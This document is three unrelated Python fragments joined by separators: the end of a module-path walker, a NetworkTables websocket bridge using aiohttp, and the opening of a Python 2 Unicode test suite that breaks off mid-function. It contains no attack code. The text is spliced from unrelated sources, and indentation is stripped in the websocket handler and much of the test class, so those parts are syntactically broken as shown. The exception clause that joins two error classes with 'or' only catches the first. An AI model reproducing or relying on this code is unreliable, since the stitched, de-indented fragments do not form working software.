    def walkModules(self, importPackages=False):
        """
        Similar to L{iterModules}, this yields every module on the path, then every
        submodule in each package or entry.

        @param importPackages: import packages as they are seen, so that their
        run-time C{__path__} attributes are respected during the walk.
        """
        for package in self.iterModules():
            # FIX: the flag was previously hardcoded to False here, silently
            # ignoring the importPackages argument accepted by this method.
            for module in package.walkModules(importPackages=importPackages):
                yield module
# Shared PythonPath describing the real, global import system state.
theSystemPath = PythonPath()

def walkModules(importPackages=False):
    """
    Deeply iterate all modules on the global python path.

    @param importPackages: Import packages as they are seen.
    """
    return theSystemPath.walkModules(importPackages=importPackages)

def iterModules():
    """
    Iterate all modules and top-level packages on the global Python path, but
    do not descend into packages.
    """
    return theSystemPath.iterModules()

def getModule(moduleName):
    """
    Retrieve a module from the system path.

    @param moduleName: the fully-qualified dotted name of the module.

    @return: a PythonModule describing the named module.
    """
    return theSystemPath[moduleName]
| |
from networktables import NetworkTable
from networktables2.type import ArrayData, BooleanArray, NumberArray, StringArray
import asyncio
import json
import math
from aiohttp import web, errors as weberrors
from threading import RLock
from copy import deepcopy
# Default address of the NetworkTables server to connect to.
ip_address = "127.0.0.1"
# Guard so setup_networktables() only initializes the client once.
initialized_networktables = False
# Local mirror of the NetworkTables tree as nested dicts/lists.
table_data = dict()
# Guards table_data and connections; presumably NT listener callbacks arrive
# on a different thread than the asyncio loop -- TODO confirm.
table_data_lock = RLock()
# Root NetworkTable instance; assigned by setup_networktables().
root_table = None
# One dict per live websocket client: {"socket": ws, "updated_data": bool}.
connections = list()
tagged_tables = list()
class ConnectionListener:
    """NetworkTables connection listener that mirrors the link state into the
    local cache under the ~CONNECTED~ key."""

    def connected(self, table):
        # Connection to the NetworkTables server established.
        set_local_value("~CONNECTED~", True)

    def disconnected(self, table):
        # Connection to the NetworkTables server lost.
        set_local_value("~CONNECTED~", False)
def val_listener(key, value, isNew):
    # Global NetworkTables value listener: mirror every remote change into the
    # local cache.  force_type=True so the server's value type replaces any
    # previously cached type rather than being coerced to it.
    set_local_value(key, value, force_type=True)
def get_local_value(key):
    """Look up *key* in the local table cache.

    Follows NetworkTable.PATH_SEPARATOR-delimited segments through nested
    dicts and lists (numeric segments index lists).  Returns None when any
    segment is missing or a list index is out of range.
    """
    with table_data_lock:
        if key[0] == NetworkTable.PATH_SEPARATOR:
            key = key[1:]
        node = table_data
        for segment in key.split(NetworkTable.PATH_SEPARATOR):
            if isinstance(node, list):
                index = int(segment)
                if index >= len(node):
                    return None
                node = node[index]
            else:
                if segment not in node:
                    return None
                node = node[segment]
        return node
def set_local_value(key, value, force_type=False):
    # Store *value* at *key* in the local cache, creating intermediate dict
    # nodes as needed, then flag every websocket client for an update.
    #
    # When force_type is False and the key already exists, the new value is
    # coerced to the cached value's type (so e.g. a string sent by a web
    # client does not clobber a numeric entry's type).
    with table_data_lock:
        # JSON cannot represent NaN/inf; collapse them to 0.0 before caching.
        if isinstance(value, float) and (math.isnan(value) or math.isinf(value)):
            value = 0.0
        if key[0] == NetworkTable.PATH_SEPARATOR:
            key = key[1:]
        keysplit = key.split(NetworkTable.PATH_SEPARATOR)
        # Last segment is the leaf key; everything before it is the table path.
        value_key = keysplit[-1:][0]
        table_key = keysplit[:-1]
        target_table = table_data
        for s in table_key:
            if s not in target_table:
                target_table[s] = dict()
            target_table = target_table[s]
        # Save the value if it is new
        if value_key == "":
            return
        if value_key in target_table and not force_type:
            value = type(target_table[value_key])(value)
        if isinstance(target_table, dict):
            target_table[value_key] = value
        elif isinstance(target_table, list):
            target_table[int(value_key)] = value
        else:
            raise ValueError("Unknown Table Type {}".format(type(target_table)))
        trigger_update()
def trigger_update():
    """Flag every connected websocket client as having pending data to send."""
    for connection in connections:
        connection["updated_data"] = True
def set_value(key, value):
    # Push a value from a web client into NetworkTables, coercing it to the
    # type of the currently cached value when one exists.  Array elements are
    # republished as a whole typed array, since NetworkTables has no
    # per-element update.  Always wakes the websocket senders afterwards.
    try:
        current_value = get_local_value(key)
        if current_value is not None:
            value = to_type(value, type(current_value))
        if key[0] == NetworkTable.PATH_SEPARATOR:
            key = key[1:]
        # First check if value is part of a list
        parent_object = None
        if NetworkTable.PATH_SEPARATOR in key:
            final_sep_idx = key.rfind(NetworkTable.PATH_SEPARATOR)
            parent_path = key[:final_sep_idx]
            key_end = key[final_sep_idx+1:]
            parent_object = root_table.getValue(parent_path, None)
        if isinstance(parent_object, list):
            # The key addresses one element of an array value: update the
            # element, then publish the entire array with the matching type.
            parent_object[int(key_end)] = value
            if isinstance(value, bool):
                new_arraydata = BooleanArray()
            elif isinstance(value, float) or isinstance(value, int):
                new_arraydata = NumberArray()
            else:
                new_arraydata = StringArray()
            new_arraydata.extend(parent_object)
            root_table.putValue(parent_path, new_arraydata)
        else:
            # Scalar put, dispatched on the (possibly coerced) Python type.
            if isinstance(value, bool):
                root_table.putBoolean(key, value)
            elif isinstance(value, float) or isinstance(value, int):
                root_table.putNumber(key, value)
            else:
                root_table.putString(key, str(value))
    except Exception as e:
        # Deliberately best-effort: a bad key/value from a web client must not
        # kill the server loop.  NOTE(review): consider logging with traceback.
        print(e)
    finally:
        trigger_update()
def to_type(value, target_type):
    """Coerce *value* (via its string form) toward *target_type*.

    bool targets accept the usual truthy spellings; both int and float
    targets yield a float; any other target returns the string form.
    """
    text = str(value)
    if target_type is bool:
        return text.lower() in ("yes", "true", "t", "1")
    if target_type is int or target_type is float:
        return float(text)
    return text
def setup_networktables(ip=ip_address):
    # Initialize the NetworkTables client (once) and attach the connection
    # and value listeners that keep the local cache in sync.
    # Safe to call repeatedly; calls after the first are no-ops.
    global root_table, table_data, initialized_networktables
    if initialized_networktables:
        return
    NetworkTable.setIPAddress(ip)
    NetworkTable.setClientMode()
    NetworkTable.initialize()
    root_table = NetworkTable.getTable("")
    c_listener = ConnectionListener()
    root_table.addConnectionListener(c_listener)
    # NOTE(review): second argument presumably requests immediate notification
    # for existing values -- confirm against the networktables API.
    root_table.addGlobalListener(val_listener, True)
    initialized_networktables = True
@asyncio.coroutine
def networktables_websocket(request):
# Setup websocket
ws = web.WebSocketResponse()
ws.start(request)
# Setup connection dict
con_id = len(connections)
with table_data_lock:
connection = {"socket": ws, "updated_data": True}
connections.append(connection)
print("NT Websocket {} Connected".format(con_id))
# Start listener coroutine
asyncio.async(networktables_websocket_listener(ws))
# Set IP status data
ip = request.transport.get_extra_info("sockname")[0]
set_local_value("~SERVER_IP~", ip)
last_data = dict()
# Update periodically until the websocket is closed.
try:
while True:
yield from asyncio.sleep(1)
while True:
yield from asyncio.sleep(.1)
if connection["updated_data"]:
connection["updated_data"] = False
updates = dict_delta(last_data, table_data)
string_data = json.dumps(updates)
#print("Sending " + string_data)
ws.send_str(string_data)
last_data = deepcopy(table_data)
if ws.closing:
break
if ws.closing:
break
except weberrors.ClientDisconnectedError or weberrors.WSClientDisconnectedError:
print("Client Disconnected")
finally:
print("NT Websocket {} Disconnected".format(con_id))
with table_data_lock:
connections.remove(connection)
return ws
def dict_delta(dict_a, dict_b):
    """
    Recursively compare two dictionaries and return the dictionary of
    differences, i.e. retval = dict_b - dict_a.
    """
    delta = dict()
    for key, b_val in dict_b.items():
        if key not in dict_a:
            # Entirely new key: include it as-is.
            delta[key] = b_val
            continue
        a_val = dict_a[key]
        if isinstance(a_val, dict) and isinstance(b_val, dict):
            # Recurse into nested tables; only keep non-empty differences.
            nested = dict_delta(a_val, b_val)
            if len(nested) > 0:
                delta[key] = nested
        elif a_val != b_val:
            delta[key] = b_val
    return delta
@asyncio.coroutine
def networktables_websocket_listener(ws):
    # Receive JSON {"key": ..., "value": ...} messages from the websocket and
    # push each one into NetworkTables until the socket dies.
    while True:
        try:
            jdata = yield from ws.receive_str()
        except Exception:
            # Any receive failure (closed/broken socket) ends this listener.
            return
        data = json.loads(jdata)
        set_value(data["key"], data["value"])
| |
# -*- coding: iso-8859-1 -*-
""" Test script for the Unicode implementation.
Written by Marc-Andre Lemburg (mal@lemburg.com).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
"""#"
import sys, struct, codecs
from test import test_support, string_tests
# Error handling (bad decoder return)
def search_function(encoding):
    """Codec search function supplying deliberately broken codecs.

    "test.unicode1" yields encode/decode callables returning a plain int
    (not a tuple); "test.unicode2" yields callables returning a 2-tuple that
    contains no unicode object.  Any other name is unhandled (None), so the
    tests can exercise the interpreter's bad-decoder error handling.
    """
    def decode1(input, errors="strict"):
        return 42 # not a tuple
    def encode1(input, errors="strict"):
        return 42 # not a tuple
    def encode2(input, errors="strict"):
        return (42, 42) # no unicode
    def decode2(input, errors="strict"):
        return (42, 42) # no unicode
    handlers = {
        "test.unicode1": (encode1, decode1, None, None),
        "test.unicode2": (encode2, decode2, None, None),
    }
    return handlers.get(encoding)
# Register the broken-codec search function so the tests below can trigger
# the interpreter's error handling for bad codec return values.
codecs.register(search_function)
class UnicodeTest(
string_tests.CommonTest,
string_tests.MixinStrUnicodeUserStringTest,
string_tests.MixinStrUnicodeTest,
):
type2test = unicode
def checkequalnofix(self, result, object, methodname, *args):
method = getattr(object, methodname)
realresult = method(*args)
self.assertEqual(realresult, result)
self.assert_(type(realresult) is type(result))
# if the original is returned make sure that
# this doesn't happen with subclasses
if realresult is object:
class usub(unicode):
def __repr__(self):
return 'usub(%r)' % unicode.__repr__(self)
object = usub(object)
method = getattr(object, methodname)
realresult = method(*args)
self.assertEqual(realresult, result)
self.assert_(object is not realresult)
def test_literals(self):
self.assertEqual(u'\xff', u'\u00ff')
self.assertEqual(u'\uffff', u'\U0000ffff')
self.assertRaises(SyntaxError, eval, 'u\'\\Ufffffffe\'')
self.assertRaises(SyntaxError, eval, 'u\'\\Uffffffff\'')
self.assertRaises(SyntaxError, eval, 'u\'\\U%08x\'' % 0x110000)
def test_repr(self):
if not sys.platform.startswith('java'):
# Test basic sanity of repr()
self.assertEqual(repr(u'abc'), "u'abc'")
self.assertEqual(repr(u'ab\\c'), "u'ab\\\\c'")
self.assertEqual(repr(u'ab\\'), "u'ab\\\\'")
self.assertEqual(repr(u'\\c'), "u'\\\\c'")
self.assertEqual(repr(u'\\'), "u'\\\\'")
self.assertEqual(repr(u'\n'), "u'\\n'")
self.assertEqual(repr(u'\r'), "u'\\r'")
self.assertEqual(repr(u'\t'), "u'\\t'")
self.assertEqual(repr(u'\b'), "u'\\x08'")
self.assertEqual(repr(u"'\""), """u'\\'"'""")
self.assertEqual(repr(u"'\""), """u'\\'"'""")
self.assertEqual(repr(u"'"), '''u"'"''')
self.assertEqual(repr(u'"'), """u'"'""")
latin1repr = (
"u'\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\t\\n\\x0b\\x0c\\r"
"\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a"
"\\x1b\\x1c\\x1d\\x1e\\x1f !\"#$%&\\'()*+,-./0123456789:;<=>?@ABCDEFGHI"
"JKLMNOPQRSTUVWXYZ[\\\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\\x7f"
"\\x80\\x81\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d"
"\\x8e\\x8f\\x90\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b"
"\\x9c\\x9d\\x9e\\x9f\\xa0\\xa1\\xa2\\xa3\\xa4\\xa5\\xa6\\xa7\\xa8\\xa9"
"\\xaa\\xab\\xac\\xad\\xae\\xaf\\xb0\\xb1\\xb2\\xb3\\xb4\\xb5\\xb6\\xb7"
"\\xb8\\xb9\\xba\\xbb\\xbc\\xbd\\xbe\\xbf\\xc0\\xc1\\xc2\\xc3\\xc4\\xc5"
"\\xc6\\xc7\\xc8\\xc9\\xca\\xcb\\xcc\\xcd\\xce\\xcf\\xd0\\xd1\\xd2\\xd3"
"\\xd4\\xd5\\xd6\\xd7\\xd8\\xd9\\xda\\xdb\\xdc\\xdd\\xde\\xdf\\xe0\\xe1"
"\\xe2\\xe3\\xe4\\xe5\\xe6\\xe7\\xe8\\xe9\\xea\\xeb\\xec\\xed\\xee\\xef"
"\\xf0\\xf1\\xf2\\xf3\\xf4\\xf5\\xf6\\xf7\\xf8\\xf9\\xfa\\xfb\\xfc\\xfd"
"\\xfe\\xff'")
testrepr = repr(u''.join(map(unichr, xrange(256))))
self.assertEqual(testrepr, latin1repr)
# Test repr works on wide unicode escapes without overflow.
self.assertEqual(repr(u"\U00010000" * 39 + u"\uffff" * 4096),
repr(u"\U00010000" * 39 + u"\uffff" * 4096))
def test_count(self):
string_tests.CommonTest.test_count(self)
# check mixed argument types
self.checkequalnofix(3, 'aaa', 'count', u'a')
self.checkequalnofix(0, 'aaa', 'count', u'b')
self.checkequalnofix(3, u'aaa', 'count', 'a')
self.checkequalnofix(0, u'aaa', 'count', 'b')
self.checkequalnofix(0, u'aaa', 'count', 'b')
self.checkequalnofix(1, u'aaa', 'count', 'a', -1)
self.checkequalnofix(3, u'aaa', 'count', 'a', -10)
self.checkequalnofix(2, u'aaa', 'count', 'a', 0, -1)
self.checkequalnofix(0, u'aaa', 'count', 'a', 0, -10)
def test_find(self):
self.checkequalnofix(0, u'abcdefghiabc', 'find', u'abc')
self.checkequalnofix(9, u'abcdefghiabc', 'find', u'abc', 1)
self.checkequalnofix(-1, u'abcdefghiabc', 'find', u'def', 4)
self.assertRaises(TypeError, u'hello'.find)
self.assertRaises(TypeError, u'hello'.find, 42)
def test_rfind(self):
string_tests.CommonTest.test_rfind(self)
# check mixed argument types
self.checkequalnofix(9, 'abcdefghiabc', 'rfind', u'abc')
self.checkequalnofix(12, 'abcdefghiabc', 'rfind', u'')
self.checkequalnofix(12, u'abcdefghiabc', 'rfind', '')
def test_index(self):
string_tests.CommonTest.test_index(self)
# check mixed argument types
for (t1, t2) in ((str, unicode), (unicode, str)):
self.checkequalnofix(0, t1('abcdefghiabc'), 'index', t2(''))
self.checkequalnofix(3, t1('abcdefghiabc'), 'index', t2('def'))
self.checkequalnofix(0, t1('abcdefghiabc'), 'index', t2('abc'))
self.checkequalnofix(9, t1('abcdefghiabc'), 'index', t2('abc'), 1)
self.assertRaises(ValueError, t1('abcdefghiabc').index, t2('hib'))
self.assertRaises(ValueError, t1('abcdefghiab').index, t2('abc'), 1)
self.assertRaises(ValueError, t1('abcdefghi').index, t2('ghi'), 8)
self.assertRaises(ValueError, t1('abcdefghi').index, t2('ghi'), -1)
def test_rindex(self):
string_tests.CommonTest.test_rindex(self)
# check mixed argument types
for (t1, t2) in ((str, unicode), (unicode, str)):
self.checkequalnofix(12, t1('abcdefghiabc'), 'rindex', t2(''))
self.checkequalnofix(3, t1('abcdefghiabc'), 'rindex', t2('def'))
self.checkequalnofix(9, t1('abcdefghiabc'), 'rindex', t2('abc'))
self.checkequalnofix(0, t1('abcdefghiabc'), 'rindex', t2('abc'), 0, -1)
self.assertRaises(ValueError, t1('abcdefghiabc').rindex, t2('hib'))
self.assertRaises(ValueError, t1('defghiabc').rindex, t2('def'), 1)
self.assertRaises(ValueError, t1('defghiabc').rindex, t2('abc'), 0, -1)
self.assertRaises(ValueError, t1('abcdefghi').rindex, t2('ghi'), 0, 8)
self.assertRaises(ValueError, t1('abcdefghi').rindex, t2('ghi'), 0, -1)
def test_translate(self):
self.checkequalnofix(u'bbbc', u'abababc', 'translate', {ord('a'):None})
self.checkequalnofix(u'iiic', u'abababc', 'translate', {ord('a'):None, ord('b'):ord('i')})
self.checkequalnofix(u'iiix', u'abababc', 'translate', {ord('a'):None, ord('b'):ord('i'), ord('c'):u'x'})
self.checkequalnofix(u'<i><i><i>c', u'abababc', 'translate', {ord('a'):None, ord('b'):u'<i>'})
self.checkequalnofix(u'c', u'abababc', 'translate', {ord('a'):None, ord('b'):u''})
self.checkequalnofix(u'xyyx', u'xzx', 'translate', {ord('z'):u'yy'})
self.assertRaises(TypeError, u'hello'.translate)
self.assertRaises(TypeError, u'abababc'.translate, {ord('a'):''})
def test_split(self):
string_tests.CommonTest.test_split(self)
# Mixed arguments
self.checkequalnofix([u'a', u'b', u'c', u'd'], u'a//b//c//d', 'split', '//')
self.checkequalnofix([u'a', u'b', u'c', u'd'], 'a//b//c//d', 'split', u'//')
self.checkequalnofix([u'endcase ', u''], u'endcase test', 'split', 'test')
def test_join(self):
string_tests.MixinStrUnicodeUserStringTest.test_join(self)
# mixed arguments
self.checkequalnofix(u'a b c d', u' ', 'join', ['a', 'b', u'c', u'd'])
self.checkequalnofix(u'abcd', u'', 'join', (u'a', u'b', u'c', u'd'))
self.checkequalnofix(u'w x y z', u' ', 'join', string_tests.Sequence('wxyz'))
self.checkequalnofix(u'a b c d', ' ', 'join', [u'a', u'b', u'c', u'd'])
self.checkequalnofix(u'a b c d', ' ', 'join', ['a', 'b', u'c', u'd'])
self.checkequalnofix(u'abcd', '', 'join', (u'a', u'b', u'c', u'd'))
self.checkequalnofix(u'w x y z', ' ', 'join', string_tests.Sequence(u'wxyz'))
def test_strip(self):
string_tests.CommonTest.test_strip(self)
self.assertRaises(UnicodeError, u"hello".strip, "\xff")
def test_replace(self):
string_tests.CommonTest.test_replace(self)
# method call forwarded from str implementation because of unicode argument
self.checkequalnofix(u'one@two!three!', 'one!two!three!', 'replace', u'!', u'@', 1)
self.assertRaises(TypeError, 'replace'.replace, u"r", 42)
def test_comparison(self):
# Comparisons:
self.assertEqual(u'abc', 'abc')
self.assertEqual('abc', u'abc')
self.assertEqual(u'abc', u'abc')
self.assert_(u'abcd' > 'abc')
self.assert_('abcd' > u'abc')
self.assert_(u'abcd' > u'abc')
self.assert_(u'abc' < 'abcd')
self.assert_('abc' < u'abcd')
self.assert_(u'abc' < u'abcd')
if 0:
# Move these tests to a Unicode collation module test...
# Testing UTF-16 code point order comparisons...
# No surrogates, no fixup required.
self.assert_(u'\u0061' < u'\u20ac')
# Non surrogate below surrogate value, no fixup required
self.assert_(u'\u0061' < u'\ud800\udc02')
# Non surrogate above surrogate value, fixup required
def test_lecmp(s, s2):
self.assert_(s < s2)
def test_fixup(s):
s2 = u'\ud800\udc01'
test_lecmp(s, s2)
s2 = u'\ud900\udc01'
test_lecmp(s, s2)
s2 = u'\uda00\udc01'
test_lecmp(s, s2)
s2 = u'\udb00\udc01'
test_lecmp(s, s2)
s2 = u'\ud800\udd01'
test_lecmp(s, s2)
s2 = u'\ud900\udd01'
test_lecmp(s, s2)
s2 = u'\uda00\udd01'
test_lecmp(s, s2)
s2 = u'\udb00\udd01'
test_lecmp(s, s2)
s2 = u'\ud800\ude01'
test_lecmp(s, s2)
s2 = u'\ud900\ude01'
test_lecmp(s, s2)
s2 = u'\uda00\ude01'
test_lecmp(s, s2)
s2 = u'\udb00\ude01'
test_lecmp(s, s2)
s2 = u'\ud800\udfff'
test_lecmp(s, s2)
s2 = u'\ud900\udfff'
test_lecmp(s, s2)
s2 = u'\uda00\udfff'
test_lecmp(s, s2)
s2 = u'\udb00\udfff'
test_lecmp(s, s2)
test_fixup(u'\ue000')
test_fixup(u'\uff61')
# Surrogates on both sides, no fixup required
self.assert_(u'\ud800\udc02' < u'\ud84d\udc56')
def test_islower(self):
    """islower() for a titlecase character (neither upper nor lower)."""
    string_tests.MixinStrUnicodeUserStringTest.test_islower(self)
    # U+1FFC is a titlecased letter, so it is not lowercase.
    self.checkequalnofix(False, u'\u1FFc', 'islower')
def test_isupper(self):
    """isupper() for a titlecase character (skipped on Jython)."""
    string_tests.MixinStrUnicodeUserStringTest.test_isupper(self)
    if not sys.platform.startswith('java'):
        # U+1FFC is titlecased, so it is not uppercase.
        self.checkequalnofix(False, u'\u1FFc', 'isupper')
def test_istitle(self):
    """istitle() must accept titlecase characters such as U+1FFC."""
    string_tests.MixinStrUnicodeUserStringTest.test_title(self)
    self.checkequalnofix(True, u'\u1FFc', 'istitle')
    self.checkequalnofix(True, u'Greek \u1FFcitlecases ...', 'istitle')
def test_isspace(self):
    """isspace() for Unicode space separators (and a non-space dash)."""
    string_tests.MixinStrUnicodeUserStringTest.test_isspace(self)
    self.checkequalnofix(True, u'\u2000', 'isspace')   # EN QUAD
    self.checkequalnofix(True, u'\u200a', 'isspace')   # HAIR SPACE
    self.checkequalnofix(False, u'\u2014', 'isspace')  # EM DASH
def test_isalpha(self):
    """isalpha() must accept non-ASCII letters such as U+1FFC."""
    string_tests.MixinStrUnicodeUserStringTest.test_isalpha(self)
    self.checkequalnofix(True, u'\u1FFc', 'isalpha')
def test_isdecimal(self):
    """isdecimal(): only decimal digit characters, not all numerics."""
    self.checkequalnofix(False, u'', 'isdecimal')
    self.checkequalnofix(False, u'a', 'isdecimal')
    self.checkequalnofix(True, u'0', 'isdecimal')
    self.checkequalnofix(False, u'\u2460', 'isdecimal') # CIRCLED DIGIT ONE
    self.checkequalnofix(False, u'\xbc', 'isdecimal') # VULGAR FRACTION ONE QUARTER
    self.checkequalnofix(True, u'\u0660', 'isdecimal') # ARABIC-INDIC DIGIT ZERO
    self.checkequalnofix(True, u'0123456789', 'isdecimal')
    self.checkequalnofix(False, u'0123456789a', 'isdecimal')

    # isdecimal() takes no arguments.
    self.checkraises(TypeError, 'abc', 'isdecimal', 42)
def test_isdigit(self):
    """isdigit(): digits include circled digits, but not fractions."""
    string_tests.MixinStrUnicodeUserStringTest.test_isdigit(self)
    self.checkequalnofix(True, u'\u2460', 'isdigit')   # CIRCLED DIGIT ONE
    self.checkequalnofix(False, u'\xbc', 'isdigit')    # VULGAR FRACTION ONE QUARTER
    self.checkequalnofix(True, u'\u0660', 'isdigit')   # ARABIC-INDIC DIGIT ZERO
def test_isnumeric(self):
    """isnumeric(): broadest numeric class, including fractions."""
    self.checkequalnofix(False, u'', 'isnumeric')
    self.checkequalnofix(False, u'a', 'isnumeric')
    self.checkequalnofix(True, u'0', 'isnumeric')
    self.checkequalnofix(True, u'\u2460', 'isnumeric')  # CIRCLED DIGIT ONE
    self.checkequalnofix(True, u'\xbc', 'isnumeric')    # VULGAR FRACTION ONE QUARTER
    self.checkequalnofix(True, u'\u0660', 'isnumeric')  # ARABIC-INDIC DIGIT ZERO
    self.checkequalnofix(True, u'0123456789', 'isnumeric')
    self.checkequalnofix(False, u'0123456789a', 'isnumeric')

    # isnumeric() takes no arguments.
    self.assertRaises(TypeError, u"abc".isnumeric, 42)
def test_contains(self):
    """The `in` operator across str/unicode operands, tuples, and NULs."""
    # Testing Unicode contains method
    self.assert_('a' in u'abdb')
    self.assert_('a' in u'bdab')
    self.assert_('a' in u'bdaba')
    self.assert_('a' in u'bdba')
    self.assert_('a' in u'bdba')
    self.assert_(u'a' in u'bdba')
    self.assert_(u'a' not in u'bdb')
    self.assert_(u'a' not in 'bdb')
    self.assert_(u'a' in 'bdba')
    # Membership in tuples (sequence containment, not substring search).
    self.assert_(u'a' in ('a',1,None))
    self.assert_(u'a' in (1,None,'a'))
    self.assert_(u'a' in (1,None,u'a'))
    self.assert_('a' in ('a',1,None))
    self.assert_('a' in (1,None,'a'))
    self.assert_('a' in (1,None,u'a'))
    self.assert_('a' not in ('x',1,u'y'))
    self.assert_('a' not in ('x',1,None))
    # Multi-character substring search.
    self.assert_(u'abcd' not in u'abcxxxx')
    self.assert_(u'ab' in u'abcd')
    self.assert_('ab' in u'abc')
    self.assert_(u'ab' in 'abc')
    self.assert_(u'ab' in (1,None,u'ab'))
    # The empty string is a substring of everything.
    self.assert_(u'' in u'abc')
    self.assert_('' in u'abc')

    # If the following fails either
    # the contains operator does not propagate UnicodeErrors or
    # someone has changed the default encoding
    self.assertRaises(UnicodeError, 'g\xe2teau'.__contains__, u'\xe2')

    self.assert_(u'' in '')
    self.assert_('' in u'')
    self.assert_(u'' in u'')
    self.assert_(u'' in 'abc')
    self.assert_('' in u'abc')
    self.assert_(u'' in u'abc')
    # NUL characters are ordinary characters, not terminators.
    self.assert_(u'\0' not in 'abc')
    self.assert_('\0' not in u'abc')
    self.assert_(u'\0' not in u'abc')
    self.assert_(u'\0' in '\0abc')
    self.assert_('\0' in u'\0abc')
    self.assert_(u'\0' in u'\0abc')
    self.assert_(u'\0' in 'abc\0')
    self.assert_('\0' in u'abc\0')
    self.assert_(u'\0' in u'abc\0')
    self.assert_(u'a' in '\0abc')
    self.assert_('a' in u'\0abc')
    self.assert_(u'a' in u'\0abc')
    # Whole-string matches.
    self.assert_(u'asdf' in 'asdf')
    self.assert_('asdf' in u'asdf')
    self.assert_(u'asdf' in u'asdf')
    self.assert_(u'asdf' not in 'asd')
    self.assert_('asdf' not in u'asd')
    self.assert_(u'asdf' not in u'asd')
    self.assert_(u'asdf' not in '')
    self.assert_('asdf' not in u'')
    self.assert_(u'asdf' not in u'')

    # __contains__ requires exactly one argument.
    self.assertRaises(TypeError, u"abc".__contains__)
def test_formatting(self):
    """%-formatting with unicode format strings and mixed arguments."""
    string_tests.MixinStrUnicodeUserStringTest.test_formatting(self)
    # Testing Unicode formatting strings...
    self.assertEqual(u"%s, %s" % (u"abc", "abc"), u'abc, abc')
    self.assertEqual(u"%s, %s, %i, %f, %5.2f" % (u"abc", "abc", 1, 2, 3), u'abc, abc, 1, 2.000000, 3.00')
    self.assertEqual(u"%s, %s, %i, %f, %5.2f" % (u"abc", "abc", 1, -2, 3), u'abc, abc, 1, -2.000000, 3.00')
    self.assertEqual(u"%s, %s, %i, %f, %5.2f" % (u"abc", "abc", -1, -2, 3.5), u'abc, abc, -1, -2.000000, 3.50')
    self.assertEqual(u"%s, %s, %i, %f, %5.2f" % (u"abc", "abc", -1, -2, 3.57), u'abc, abc, -1, -2.000000, 3.57')
    self.assertEqual(u"%s, %s, %i, %f, %5.2f" % (u"abc", "abc", -1, -2, 1003.57), u'abc, abc, -1, -2.000000, 1003.57')
    if not sys.platform.startswith('java'):
        # %r of a unicode object includes the u prefix (CPython only).
        self.assertEqual(u"%r, %r" % (u"abc", "abc"), u"u'abc', 'abc'")
    self.assertEqual(u"%(x)s, %(y)s" % {'x':u"abc", 'y':"def"}, u'abc, def')
    # Mapping keys may themselves be unicode.
    self.assertEqual(u"%(x)s, %(\xfc)s" % {'x':u"abc", u'\xfc':"def"}, u'abc, def')

    # %c accepts a code point number.
    self.assertEqual(u'%c' % 0x1234, u'\u1234')
    self.assertRaises(OverflowError, u"%c".__mod__, (sys.maxunicode+1,))

    # formatting jobs delegated from the string implementation:
    self.assertEqual('...%(foo)s...' % {'foo':u"abc"}, u'...abc...')
    self.assertEqual('...%(foo)s...' % {'foo':"abc"}, '...abc...')
    self.assertEqual('...%(foo)s...' % {u'foo':"abc"}, '...abc...')
    self.assertEqual('...%(foo)s...' % {u'foo':u"abc"}, u'...abc...')
    self.assertEqual('...%(foo)s...' % {u'foo':u"abc",'def':123},  u'...abc...')
    self.assertEqual('...%(foo)s...' % {u'foo':u"abc",u'def':123}, u'...abc...')
    self.assertEqual('...%s...%s...%s...%s...' % (1,2,3,u"abc"), u'...1...2...3...abc...')
    self.assertEqual('...%%...%%s...%s...%s...%s...%s...' % (1,2,3,u"abc"), u'...%...%s...1...2...3...abc...')
    self.assertEqual('...%s...' % u"abc", u'...abc...')
    # * width/precision taken from the argument tuple.
    self.assertEqual('%*s' % (5,u'abc',), u'  abc')
    self.assertEqual('%*s' % (-5,u'abc',), u'abc  ')
    self.assertEqual('%*.*s' % (5,2,u'abc',), u'   ab')
    self.assertEqual('%*.*s' % (5,3,u'abc',), u'  abc')
    self.assertEqual('%i %*.*s' % (10, 5,3,u'abc',), u'10   abc')
    self.assertEqual('%i%s %*.*s' % (10, 3, 5, 3, u'abc',), u'103   abc')
    self.assertEqual('%c' % u'a', u'a')

    # __str__ may return a unicode object.
    class Wrapper:
        def __str__(self):
            return u'\u1234'
    self.assertEqual('%s' % Wrapper(), u'\u1234')
@test_support.run_with_locale('LC_ALL', 'de_DE', 'fr_FR')
def test_format_float(self):
    """Float %-formatting must use the C locale even under de_DE/fr_FR."""
    # should not format with a comma, but always with C locale
    self.assertEqual(u'1.0', u'%.1f' % 1.0)
def test_constructor(self):
    """The unicode() constructor, with and without an explicit encoding."""
    # unicode(obj) tests (this maps to PyObject_Unicode() at C level)

    self.assertEqual(
        unicode(u'unicode remains unicode'),
        u'unicode remains unicode'
    )

    class UnicodeSubclass(unicode):
        pass

    # Subclass instances are converted to plain unicode.
    self.assertEqual(
        unicode(UnicodeSubclass('unicode subclass becomes unicode')),
        u'unicode subclass becomes unicode'
    )

    self.assertEqual(
        unicode('strings are converted to unicode'),
        u'strings are converted to unicode'
    )

    class UnicodeCompat:
        def __init__(self, x):
            self.x = x
        def __unicode__(self):
            return self.x

    self.assertEqual(
        unicode(UnicodeCompat('__unicode__ compatible objects are recognized')),
        u'__unicode__ compatible objects are recognized')

    class StringCompat:
        def __init__(self, x):
            self.x = x
        def __str__(self):
            return self.x

    # __str__ is used as a fallback when __unicode__ is absent.
    self.assertEqual(
        unicode(StringCompat('__str__ compatible objects are recognized')),
        u'__str__ compatible objects are recognized'
    )

    # unicode(obj) is compatible to str():

    o = StringCompat('unicode(obj) is compatible to str()')
    self.assertEqual(unicode(o), u'unicode(obj) is compatible to str()')
    self.assertEqual(str(o), 'unicode(obj) is compatible to str()')

    # %-formatting and .__unicode__()
    self.assertEqual(u'%s' %
                     UnicodeCompat(u"u'%s' % obj uses obj.__unicode__()"),
                     u"u'%s' % obj uses obj.__unicode__()")
    self.assertEqual(u'%s' %
                     UnicodeCompat(u"u'%s' % obj falls back to obj.__str__()"),
                     u"u'%s' % obj falls back to obj.__str__()")

    # Numbers convert via their str() representation.
    for obj in (123, 123.45, 123L):
        self.assertEqual(unicode(obj), unicode(str(obj)))

    # unicode(obj, encoding, error) tests (this maps to
    # PyUnicode_FromEncodedObject() at C level)

    if not sys.platform.startswith('java'):
